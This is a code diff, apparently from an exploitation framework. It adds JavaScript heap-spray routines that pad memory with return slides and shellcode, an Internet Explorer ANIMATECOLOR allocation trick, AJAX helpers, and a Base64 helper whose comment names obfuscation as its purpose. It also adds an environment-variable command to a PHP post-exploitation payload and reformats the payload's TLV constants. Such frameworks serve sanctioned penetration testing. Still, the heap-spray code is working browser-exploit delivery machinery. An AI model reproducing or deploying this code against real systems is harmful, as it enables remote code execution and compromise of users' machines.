+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}
@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}
@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}
@@ -0,0 +1,18 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, false);
+  xmlHttp.send(oArg.data);
+  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+    return xmlHttp.responseText;
+  }
+  return null;
+}
@@ -0,0 +1,10 @@
+function postInfo(path, data) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, false);
+  xmlHttp.send(data);
+}
@@ -0,0 +1,15 @@
+if (!window.XMLHTTPRequest) {
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
+    }
+  })();
+}
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};
@@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA",          TLV_META_TYPE_RAW     | 1012);
 define("TLV_TYPE_COMPUTER_NAME",       TLV_META_TYPE_STRING  | 1040);
 define("TLV_TYPE_OS_NAME",             TLV_META_TYPE_STRING  | 1041);
 define("TLV_TYPE_USER_NAME",           TLV_META_TYPE_STRING  | 1042);
+define("TLV_TYPE_ARCHITECTURE",        TLV_META_TYPE_STRING  | 1043);
+define("TLV_TYPE_LANG_SYSTEM",         TLV_META_TYPE_STRING  | 1044);
+
+# Environment
+define("TLV_TYPE_ENV_VARIABLE",        TLV_META_TYPE_STRING  | 1100);
+define("TLV_TYPE_ENV_VALUE",           TLV_META_TYPE_STRING  | 1101);
+define("TLV_TYPE_ENV_GROUP",           TLV_META_TYPE_GROUP   | 1102);
+

 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));

@@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
 # eval'd twice
 my_print("Evaling stdapi");

-## 
+##
 # Search Helpers
 ##

@@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
 */
 if (!function_exists('safe_glob')) {
 function safe_glob($pattern, $flags=0) {
-	$split=explode('/',str_replace('\\','/',$pattern));
-	$mask=array_pop($split);
-	$path=implode('/',$split);
-	if (($dir=opendir($path))!==false) {
-		$glob=array();
-		while (($file=readdir($dir))!==false) {
-			// Recurse subdirectories (GLOB_RECURSE)
-			if ( 
-				(
-				 $flags&GLOB_RECURSE) && is_dir($path."/".$file) 
-   				 && (!in_array($file,array('.','..'))
-				 # don't follow links to avoid infinite recursion
-				 && (!is_link($path."/".$file))
-				)
-   			) {
-				$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
-							($flags&GLOB_PATH?'':$file.'/')));
+    $split=explode('/',str_replace('\\','/',$pattern));
+    $mask=array_pop($split);
+    $path=implode('/',$split);
+    if (($dir=opendir($path))!==false) {
+        $glob=array();
+        while (($file=readdir($dir))!==false) {
+            // Recurse subdirectories (GLOB_RECURSE)
+            if (
+                (
+                    $flags&GLOB_RECURSE) && is_dir($path."/".$file)
+                    && (!in_array($file,array('.','..'))
+                    # don't follow links to avoid infinite recursion
+                    && (!is_link($path."/".$file))
+                )
+            ) {
+                $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
+                    ($flags&GLOB_PATH?'':$file.'/')));
            }
-			// Match file mask
-			if (fnmatch($mask,$file)) {
-				if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
-						&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
-						&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
-					$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
-			}
-		}
-		closedir($dir);
-		if (!($flags&GLOB_NOSORT)) sort($glob);
-		return $glob;
-	} else {
-		return false;
-	}   
+            // Match file mask
+            if (fnmatch($mask,$file)) {
+                if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
+                    && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
+                    && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
+                    $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
+            }
+        }
+        closedir($dir);
+        if (!($flags&GLOB_NOSORT)) sort($glob);
+        return $glob;
+    } else {
+        return false;
+    }
 }
 }
 /**
@@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
 */
 if (!function_exists('fnmatch')) {
 function fnmatch($pattern, $string) {
-	return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
+    return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
 }
 }

@@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
        else
            $array[$key] = $string.$element;
    return $array;
-   
+
 }
 }

@@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
    $path = cononicalize_path($path_tlv['value']);

-		if (is_callable("md5_file")) {
-			$md5 = md5_file($path);
-		} else {
-			$md5 = md5(file_get_contents($path));
-		}
-		$md5 = pack("H*", $md5);
-		# Ghetto abuse of file name type to indicate the md5 result
+    if (is_callable("md5_file")) {
+        $md5 = md5_file($path);
+    } else {
+        $md5 = md5(file_get_contents($path));
+    }
+    $md5 = pack("H*", $md5);
+    # Ghetto abuse of file name type to indicate the md5 result
    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
    return ERROR_SUCCESS;
 }
@@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
    $path = cononicalize_path($path_tlv['value']);

-		if (is_callable("sha1_file")) {
-			$sha1 = sha1_file($path);
-		} else {
-			$sha1 = sha1(file_get_contents($path));
-		}
-		$sha1 = pack("H*", $sha1);
-		# Ghetto abuse of file name type to indicate the sha1 result
+    if (is_callable("sha1_file")) {
+        $sha1 = sha1_file($path);
+    } else {
+        $sha1 = sha1(file_get_contents($path));
+    }
+    $sha1 = pack("H*", $sha1);
+    # Ghetto abuse of file name type to indicate the sha1 result
    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
    return ERROR_SUCCESS;
 }
@@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
 }
 }

+if (!function_exists('stdapi_sys_config_getenv')) {
+register_command('stdapi_sys_config_getenv');
+function stdapi_sys_config_getenv($req, &$pkt) {
+    my_print("doing getenv");
+
+    $variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
+
+    # If we decide some day to have sys.config.getenv return all env
+    # vars when given an empty search list, this is one way to do it.
+    #if (empty($variable_tlvs)) {
+    #    # We don't have a var to look up, return all of 'em
+    #    $variables = array_keys($_SERVER);
+    #} else {
+    #    $variables = array();
+    #    foreach ($variable_tlvs as $tlv) {
+    #        array_push($variables, $tlv['value']);
+    #    }
+    #}
+
+    foreach ($variable_tlvs as $name) {
+        $canonical_name = str_replace(array("$","%"), "", $name['value']);
+        $env = getenv($canonical_name);
+        if ($env !== FALSE) {
+            $grp = "";
+            $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
+            $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
+            packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
+        }
+    }
+
+    return ERROR_SUCCESS;
+}
+}
+
+
 # Unimplemented becuase it's unimplementable
 #if (!function_exists('stdapi_sys_config_rev2self')) {
 #register_command('stdapi_sys_config_rev2self');
@@ -696,24 +739,24 @@ function close_process($proc) {
        foreach ($proc['pipes'] as $f) {
            @fclose($f);
        }
-		if (is_callable('proc_get_status')) {
-			$status = proc_get_status($proc['handle']);
-		} else {
-			# fake a running process on php < 4.3
-			$status = array('running' => true);
-		}
+        if (is_callable('proc_get_status')) {
+            $status = proc_get_status($proc['handle']);
+        } else {
+            # fake a running process on php < 4.3
+            $status = array('running' => true);
+        }

-		# proc_close blocks waiting for the child to exit, so if it's still
-		# running, don't take a chance on deadlock and just sigkill it if we
-		# can.  We can't on php < 4.3, so don't do anything.  This will leave
-		# zombie processes, but that's better than deadlock.
-		if ($status['running'] == false) {
-			proc_close($proc['handle']);
-		} else {
-			if (is_callable('proc_terminate')) {
-				proc_terminate($proc['handle'], 9);
-			}
-		}
+        # proc_close blocks waiting for the child to exit, so if it's still
+        # running, don't take a chance on deadlock and just sigkill it if we
+        # can.  We can't on php < 4.3, so don't do anything.  This will leave
+        # zombie processes, but that's better than deadlock.
+        if ($status['running'] == false) {
+            proc_close($proc['handle']);
+        } else {
+            if (is_callable('proc_terminate')) {
+                proc_terminate($proc['handle'], 9);
+            }
+        }
        if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
            unset($channel_process_map[$proc['cid']]);
        }
@@ -86,168 +86,185 @@ TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
 #
 # TLV Specific Types
 #
-TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
-TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
-TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
-TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
+TLV_TYPE_METHOD                = TLV_META_TYPE_STRING  | 1
+TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
+TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
+TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4

-TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
-TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
-TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+TLV_TYPE_STRING                = TLV_META_TYPE_STRING  | 10
+TLV_TYPE_UINT                  = TLV_META_TYPE_UINT    | 11
+TLV_TYPE_BOOL                  = TLV_META_TYPE_BOOL    | 12

-TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
-TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
-TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+TLV_TYPE_LENGTH                = TLV_META_TYPE_UINT    | 25
+TLV_TYPE_DATA                  = TLV_META_TYPE_RAW     | 26
+TLV_TYPE_FLAGS                 = TLV_META_TYPE_UINT    | 27

-TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
-TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
-TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
-TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
-TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+TLV_TYPE_CHANNEL_ID            = TLV_META_TYPE_UINT    | 50
+TLV_TYPE_CHANNEL_TYPE          = TLV_META_TYPE_STRING  | 51
+TLV_TYPE_CHANNEL_DATA          = TLV_META_TYPE_RAW     | 52
+TLV_TYPE_CHANNEL_DATA_GROUP    = TLV_META_TYPE_GROUP   | 53
+TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54

 ##
 # General
 ##
-TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
-TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
-TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
-TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
+TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631

 ##
 # Fs
 ##
-TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
-TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
-TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
-TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
-TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
+TLV_TYPE_DIRECTORY_PATH        = TLV_META_TYPE_STRING  | 1200
+TLV_TYPE_FILE_NAME             = TLV_META_TYPE_STRING  | 1201
+TLV_TYPE_FILE_PATH             = TLV_META_TYPE_STRING  | 1202
+TLV_TYPE_FILE_MODE             = TLV_META_TYPE_STRING  | 1203
+TLV_TYPE_FILE_SIZE             = TLV_META_TYPE_UINT    | 1204

-TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
+TLV_TYPE_STAT_BUF              = TLV_META_TYPE_COMPLEX | 1220

-TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
-TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
-TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
-TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
+TLV_TYPE_SEARCH_RECURSE        = TLV_META_TYPE_BOOL    | 1230
+TLV_TYPE_SEARCH_GLOB           = TLV_META_TYPE_STRING  | 1231
+TLV_TYPE_SEARCH_ROOT           = TLV_META_TYPE_STRING  | 1232
+TLV_TYPE_SEARCH_RESULTS        = TLV_META_TYPE_GROUP   | 1233

 ##
 # Net
 ##
-TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
-TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
+TLV_TYPE_HOST_NAME             = TLV_META_TYPE_STRING  | 1400
+TLV_TYPE_PORT                  = TLV_META_TYPE_UINT    | 1401

-TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
-TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
-TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
-TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
+TLV_TYPE_SUBNET                = TLV_META_TYPE_RAW     | 1420
+TLV_TYPE_NETMASK               = TLV_META_TYPE_RAW     | 1421
+TLV_TYPE_GATEWAY               = TLV_META_TYPE_RAW     | 1422
+TLV_TYPE_NETWORK_ROUTE         = TLV_META_TYPE_GROUP   | 1423

-TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
-TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
-TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
-TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
+TLV_TYPE_IP                    = TLV_META_TYPE_RAW     | 1430
+TLV_TYPE_MAC_ADDRESS           = TLV_META_TYPE_RAW     | 1431
+TLV_TYPE_MAC_NAME              = TLV_META_TYPE_STRING  | 1432
+TLV_TYPE_NETWORK_INTERFACE     = TLV_META_TYPE_GROUP   | 1433

-TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
-TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
-TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
+TLV_TYPE_SUBNET_STRING         = TLV_META_TYPE_STRING  | 1440
+TLV_TYPE_NETMASK_STRING        = TLV_META_TYPE_STRING  | 1441
+TLV_TYPE_GATEWAY_STRING        = TLV_META_TYPE_STRING  | 1442
+TLV_TYPE_ROUTE_METRIC          = TLV_META_TYPE_UINT    | 1443
+TLV_TYPE_ADDR_TYPE             = TLV_META_TYPE_UINT    | 1444

+##
 # Socket
-TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
-TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
-TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
-TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
-TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
+##
+TLV_TYPE_PEER_HOST             = TLV_META_TYPE_STRING  | 1500
+TLV_TYPE_PEER_PORT             = TLV_META_TYPE_UINT    | 1501
+TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
+TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503
+TLV_TYPE_CONNECT_RETRIES       = TLV_META_TYPE_UINT    | 1504

-TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
+TLV_TYPE_SHUTDOWN_HOW          = TLV_META_TYPE_UINT    | 1530

+##
 # Registry
-TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
-TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
-TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
-TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
-TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
-TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
-TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
-TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
-TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
+##
+TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
+TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
+TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
+TLV_TYPE_KEY_NAME              = TLV_META_TYPE_STRING  | 1003
+TLV_TYPE_VALUE_NAME            = TLV_META_TYPE_STRING  | 1010
+TLV_TYPE_VALUE_TYPE            = TLV_META_TYPE_UINT    | 1011
+TLV_TYPE_VALUE_DATA            = TLV_META_TYPE_RAW     | 1012
+TLV_TYPE_TARGET_HOST           = TLV_META_TYPE_STRING  | 1013

+##
 # Config
-TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
-TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
-TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
-TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
+##
+TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME               = TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME             = TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE          = TLV_META_TYPE_STRING  | 1043
+
+##
+# Environment
+##
+TLV_TYPE_ENV_VARIABLE          = TLV_META_TYPE_STRING  | 1100
+TLV_TYPE_ENV_VALUE             = TLV_META_TYPE_STRING  | 1101
+TLV_TYPE_ENV_GROUP             = TLV_META_TYPE_GROUP   | 1102

 DELETE_KEY_FLAG_RECURSIVE = (1 << 0)

+##
 # Process
-TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
-TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
-TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
-TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
-TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
-TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
-TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
-TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
-TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
-TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
-TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
-TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
-TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
-TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
-TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
-TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
+##
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
+TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
+TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
+TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
+TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
+TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
+TLV_TYPE_PID                   = TLV_META_TYPE_UINT    | 2300
+TLV_TYPE_PROCESS_NAME          = TLV_META_TYPE_STRING  | 2301
+TLV_TYPE_PROCESS_PATH          = TLV_META_TYPE_STRING  | 2302
+TLV_TYPE_PROCESS_GROUP         = TLV_META_TYPE_GROUP   | 2303
+TLV_TYPE_PROCESS_FLAGS         = TLV_META_TYPE_UINT    | 2304
+TLV_TYPE_PROCESS_ARGUMENTS     = TLV_META_TYPE_STRING  | 2305
+TLV_TYPE_PROCESS_ARCH          = TLV_META_TYPE_UINT    | 2306
+TLV_TYPE_PARENT_PID            = TLV_META_TYPE_UINT    | 2307

-TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
-TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
-TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
